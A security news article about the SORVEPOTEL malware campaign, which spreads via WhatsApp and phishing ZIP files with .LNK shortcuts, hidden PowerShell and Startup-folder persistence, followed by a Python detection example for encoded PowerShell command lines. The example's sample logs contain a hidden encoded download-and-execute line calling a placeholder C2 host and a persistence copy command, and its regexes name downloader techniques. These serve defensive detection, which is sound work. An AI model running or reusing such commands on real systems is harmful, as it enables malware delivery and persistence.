Threat Actors Leveraging WhatsApp Messages to Attack Windows Systems With SORVEPOTEL Malware


Enterprise networks worldwide are facing an aggressive, self-propagating malware campaign that exploits WhatsApp as its primary delivery mechanism.

First observed in early September 2025 targeting Brazilian organizations, SORVEPOTEL spreads through convincing phishing messages carrying malicious ZIP attachments.

Upon execution, the malware not only establishes a foothold on the host system but also hijacks active WhatsApp Web sessions to replicate itself across all contacts and groups associated with the compromised account.

This unprecedented blend of social engineering and automated propagation has elevated SORVEPOTEL into a significant threat for enterprises relying on messaging platforms for internal communication.

Initial reports traced the campaign to phishing messages bearing archive names such as RES-20250930112057.zip or ORCAMENTO114418.zip, masquerading as innocuous documents like receipts or budgets.

These messages prompt users to “baixa o zip no PC e abre” (download the ZIP on PC and open it), explicitly targeting desktop sessions to maximize enterprise impact.


Trend Micro analysts identified that an alternative infection vector involves phishing emails distributing similarly named ZIP attachments, often appearing to originate from trusted institutions with subjects like “ComprovanteSantander-75319981.682657420.zip.”

Once the ZIP is extracted, the victim encounters a deceptive Windows shortcut (.LNK) file designed to launch a hidden PowerShell script, which downloads and executes the primary payload from attacker-controlled domains.

Attack Chain

As the .LNK file executes, it invokes an encoded command that launches a batch script in a concealed window.

The SORVEPOTEL attack chain (Source – Trend Micro)

This attack chain shows the Base64-encoded command line embedded in the shortcut: the payload is handed to PowerShell through the -enc (EncodedCommand) parameter and run with Invoke-Expression (IEX), which hides the script body from casual inspection.

This script retrieves a secondary batch file payload and establishes persistence by copying itself into the Windows Startup folder.

Through a series of Base64-encoded PowerShell commands, the malware generates URLs pointing to command-and-control (C2) servers and uses Net.WebClient to fetch additional components, which are then executed in memory.

The decoded command inside the batch file connects to the C2 infrastructure. By employing typo-squatted domains such as sorvetenopotel.com (a play on the Portuguese phrase “sorvete no pote”, “ice cream in the tub”), the attackers blend malicious traffic with legitimate network flows, evading basic detection mechanisms.
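The stages described above (hidden PowerShell window, -enc payload decoding to IEX plus Net.WebClient, copy into the Startup folder) map directly onto process-creation telemetry. The following is an added detection example, not code from the article or from Trend Micro; the log lines, the stage-two script and the C2 host are constructed placeholders, and the `-enc` decoding follows PowerShell's documented UTF-16LE/Base64 convention.

```python
import base64
import re

# Detection example written for this article; sample input is constructed and
# the C2 address is a placeholder, not the real infrastructure.
ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = [  # (regex applied to lowercased text, label)
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"\b(?:iex|invoke-expression)\b", "Invoke-Expression / IEX"),
    (r"net\.webclient", "Net.WebClient downloader"),
    (r"downloadstring|downloadfile", "remote payload fetch"),
    (r"programs\\startup", "Startup folder write (persistence)"),
]

def encode_ps(command: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_enc(cmdline: str):
    """Return the decoded -enc payload, or None if the line carries none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable -enc argument>"

def analyze(cmdline: str) -> dict:
    """Decode any -enc argument and list the SORVEPOTEL-style indicators present."""
    decoded = decode_enc(cmdline)
    findings = ["encoded command (-enc)"] if decoded else []
    text = (cmdline + " " + (decoded or "")).lower()
    findings += [label for rx, label in INDICATORS if re.search(rx, text)]
    # Two or more stages on one line is a far stronger signal than a lone -enc,
    # which legitimate admin tooling also uses.
    return {"decoded": decoded, "findings": findings, "suspicious": len(findings) >= 2}

# Constructed sample process-creation lines: benign admin use, the .LNK stage, persistence.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2-placeholder.invalid/s2')"
SAMPLE_LOGS = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    f"powershell.exe -w hidden -nop -enc {encode_ps(STAGE2)}",
    r"cmd.exe /c copy stage.bat %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup",
]
```

Run `analyze()` over each entry of `SAMPLE_LOGS`: the benign line yields no findings, the shortcut stage decodes to `STAGE2` and is flagged, and the Startup-folder copy surfaces the persistence indicator.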

Once persistence is in place, the malware scans for active WhatsApp Web sessions. Upon locating an authenticated session, SORVEPOTEL automatically propagates the same malicious ZIP across all contacts and groups.

This automated spam not only multiplies infection rates but often results in compromised accounts being banned for violating WhatsApp’s terms of service.

By combining social engineering, script-based execution, and rapid session hijacking, SORVEPOTEL demonstrates a novel escalation in messaging-platform attacks.

The malware’s focus on widespread distribution rather than immediate data theft underscores a shift toward maximizing reach and operational disruption.

Organizations should enforce strict endpoint policies to block unauthorized shortcuts, disable auto-download features in messaging applications, and conduct regular user awareness training to mitigate the evolving risk posed by self-propagating threats like SORVEPOTEL.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.